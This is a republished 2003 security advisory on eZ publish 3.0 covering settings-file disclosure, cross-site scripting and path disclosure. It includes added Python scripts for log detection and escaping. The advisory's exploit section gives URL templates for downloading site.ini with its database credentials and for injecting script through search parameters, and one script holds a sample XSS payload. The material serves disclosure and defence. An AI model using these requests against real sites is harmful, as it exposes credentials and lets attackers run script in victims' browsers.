
SecCorp SCSA-016: multiple vulnerabilities in EZ Publish

by Nikola Strahija on April 15th, 2003

A vulnerability has been discovered in EZ Publish version 3.0 and prior which, if exploited, could lead to sensitive information disclosure.


======================================================================
Security Corporation Security Advisory [SCSA-016]

Multiple vulnerabilities in Ez publish
======================================================================

PROGRAM: Ez publish
HOMEPAGE: http://www.ez.no
VULNERABLE VERSIONS: 3.0 and prior ?
RISK: Medium/High
IMPACT: Sensitive information disclosure
Cross Site Scripting
Path Disclosure
RELEASE DATE: 2003-04-15

Security Corporation's Free weekly Newsletter :
http://www.security-corporation.com/index.php?id=newsletter

======================================================================
TABLE OF CONTENTS
======================================================================

1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6........................................................VENDOR STATUS
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10............................................................FEEDBACK

1. DESCRIPTION
======================================================================

"eZ publish 3 is an open source content management system and
development framework. "

(direct quote from http://www.ez.no)



2. DETAILS
======================================================================

¤ Sensitive information disclosure :

A security vulnerability was found in Ez publish which allows
a remote attacker to access sensitive information such as
the database name and password.

This vulnerability can be triggered by a remote user submitting
a specially crafted HTTP request.

For example, an attacker can download the site.ini file, which
discloses information such as the following:

---- site.ini -----

[DatabaseSettings]
DatabasePluginPath=
# Use either ezmysql or ezpostgresql
DatabaseImplementation=ezmysql
Server=localhost
User=nextgen
Password=nextgen
Database=nextgen
# Enable slave servers
# The slave servers will only be used for read queries
# Useful for load balanced environments
UseSlaveServer=disabled
#SlaveServerArray[]=localhost
#SlaverServerUser[]=nextgen
#SlaverServerPassword[]=nextgen
#SlaverServerDatabase[]=nextgen
# The number of times to reconnect if the first fails
ConnectRetries=0
Charset=iso-8859-1
# Use charset conversion routines in DB if possible
UseBuiltinEncoding=true
Socket=disabled
SQLOutput=disabled
UsePersistentConnection=disabled

[SiteSettings]
# Name of the site, will be used in default templates in titles.
SiteName=eZ publish
# URL of site, often used to link to site in emails etc.
SiteURL=mysite.com
# List of metadata to set in pagelayout
MetaDataArray[author]=eZ systems
MetaDataArray[copyright]=eZ systems
MetaDataArray[description]=Content Management System
MetaDataArray[keywords]=cms, publish, e-commerce, content management
Dir=
# Which page to show when the root index (/) is accessed
IndexPage=/content/view/sitemap/2/
# What to do when a module does not exists, use either defaultpage or
# displayerror
ErrorHandler=displayerror
# Displayed if an error occurs and ErrorHandler is set to defaultpage
DefaultPage=/content/view/sitemap/2/
# Default access is needed when uri type matching is done, this is
# because with empty urls it's not possible to fetch the access
DefaultAccess=demo
# How the login page should be handled, use embedded to show inside default
# pagelayout
# or custom for loginpagelayout.tpl
LoginPage=custom
# The SSL port, the default should be OK for most sites but can be
# changed if different. If the port is detect all redirects will
# be done with https protocol.
SSLPort=443

-------------------
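The disclosure above is visible in ordinary web-server access logs: any request for a file under /settings/ that ends in .ini and is answered with status 200 means the configuration was served. The following detection script is an added example written for this page; it is not part of the advisory or of Ez publish. It parses Apache "combined" log lines (the sample lines are constructed) and reports every settings-file request, marking those that succeeded. Paths are percent-decoded first so that an encoded file name is not missed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access log in Apache "combined" format (not taken from the advisory).
# Line 2 uses a made-up file name (example.ini) to show a blocked request.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Apr/2003:10:01:02 +0200] "GET /settings/site.ini HTTP/1.0" 200 2731 "-" "Mozilla/4.0"
203.0.113.7 - - [15/Apr/2003:10:01:09 +0200] "GET /settings/example.ini HTTP/1.0" 404 212 "-" "Mozilla/4.0"
198.51.100.3 - - [15/Apr/2003:10:02:44 +0200] "GET /index.php/content/view/sitemap/2/ HTTP/1.1" 200 9812 "-" "Mozilla/4.0"
203.0.113.7 - - [15/Apr/2003:10:03:15 +0200] "GET /settings/%73ite.ini?x=1 HTTP/1.0" 200 2731 "-" "Mozilla/4.0"
"""

# Fields of a combined-format line that the check needs: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Any .ini file below /settings/, including files in sub-directories.
SETTINGS_RE = re.compile(r'^/settings/.+\.ini$', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    # Strip the query string and percent-decode, so /settings/%73ite.ini is seen as /settings/site.ini.
    rec['path'] = unquote(urlsplit(rec['target']).path)
    return rec


def settings_file_hits(log_text):
    """Return (ip, path, status, outcome) for every request of a .ini file under /settings/.

    outcome is 'DISCLOSED' when the server answered 200 (the file was served) and
    'blocked' for any other status (403, 404, ...).
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not SETTINGS_RE.match(rec['path']):
            continue
        outcome = 'DISCLOSED' if rec['status'] == 200 else 'blocked'
        hits.append((rec['ip'], rec['path'], rec['status'], outcome))
    return hits


def disclosed_by_ip(hits):
    """Count successful settings-file downloads per client address."""
    counts = {}
    for ip, _path, _status, outcome in hits:
        if outcome == 'DISCLOSED':
            counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == '__main__':
    found = settings_file_hits(SAMPLE_LOG)
    for ip, path, status, outcome in found:
        print(f'{outcome:9} {status} {ip:15} {path}')
    print('clients that obtained a settings file:', disclosed_by_ip(found))
```

A 200 on any of these paths means the fix (denying web access to the settings directory) is not in place, regardless of whether the request came from a scanner or a person; a 403 or 404 shows the attempt and that it failed.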


¤ Cross Site Scripting :

Several exploitable bugs were found in Ez publish which cause script
execution on the client's computer when a crafted URL is followed.

This kind of attack, known as "Cross-Site Scripting", is present
in many sections of the web site: an attacker can inject specially
crafted links and/or other malicious scripts.
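The search parameter is reflected into the page without escaping, and because it lands inside an attribute value as well as in element text, a value containing `">` closes the attribute and can open a new tag. The script below is an added illustration written for this page, not code from Ez publish: it models a minimal search page in Python, shows the unescaped rendering next to the hardened one that uses `html.escape(..., quote=True)`, and uses the standard-library HTML parser to check whether the reflected value introduced any tag the template did not have. The URL and host (`example.invalid`) are constructed.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request URL in the shape the advisory describes; host and payload are made up.
SAMPLE_URL = ('http://example.invalid/index.php/content/search/'
              '?SectionID=3&SearchText=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E')
PAYLOAD = '"><script>alert(1)</script>'


def search_text_from_url(url):
    """Return the SearchText query parameter as the application receives it (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get('SearchText', [''])[0]


def render_search_vulnerable(search_text):
    """Reflect the raw parameter into an attribute and into element text (the flaw)."""
    return (
        f'<form><input name="SearchText" value="{search_text}"></form>\n'
        f'<h2>Search results for: {search_text}</h2>'
    )


def render_search_hardened(search_text):
    """Same template, but the value is HTML-escaped for both contexts.

    quote=True also escapes " and ', which is what keeps the value inside the attribute.
    """
    safe = html.escape(search_text, quote=True)
    return (
        f'<form><input name="SearchText" value="{safe}"></form>\n'
        f'<h2>Search results for: {safe}</h2>'
    )


class _TagCollector(HTMLParser):
    """Collect the names of every start tag the browser-like parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(rendered):
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser.tags


def has_unexpected_tags(rendered, allowed=('form', 'input', 'h2')):
    """True when the rendered page contains a tag that is not part of the template."""
    return any(tag not in allowed for tag in tags_in(rendered))


if __name__ == '__main__':
    text = search_text_from_url(SAMPLE_URL)
    for name, render in (('vulnerable', render_search_vulnerable),
                         ('hardened', render_search_hardened)):
        page = render(text)
        print(f'{name}: tags={tags_in(page)} injected={has_unexpected_tags(page)}')
```

The check is deliberately structural rather than a string match for `<script`: any new start tag in the output means the reflected value escaped its context, whichever payload was used.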


¤ Path Disclosure :

Many vulnerabilities have been found in Ez publish which allow
attackers to determine the physical path of the application.

These vulnerabilities would allow a remote user to determine the
full path to the web root directory and other potentially
sensitive information. This vulnerability can be triggered by a
remote user submitting a specially crafted HTTP request.




3. EXPLOITS
======================================================================

¤ Sensitive information disclosure :

http://[target]/settings/[file_name]

For example :

http://[target]/settings/site.ini



¤ Cross Site Scripting :

http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code]

http://[target]/index.php/content/advancedsearch/?SearchText=[hostile_code]&PhraseSearchText=[hostile_code]&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search

http://[target]/index.php/[any_section]/">[hostile_code]<

http://[target]/index.php/">
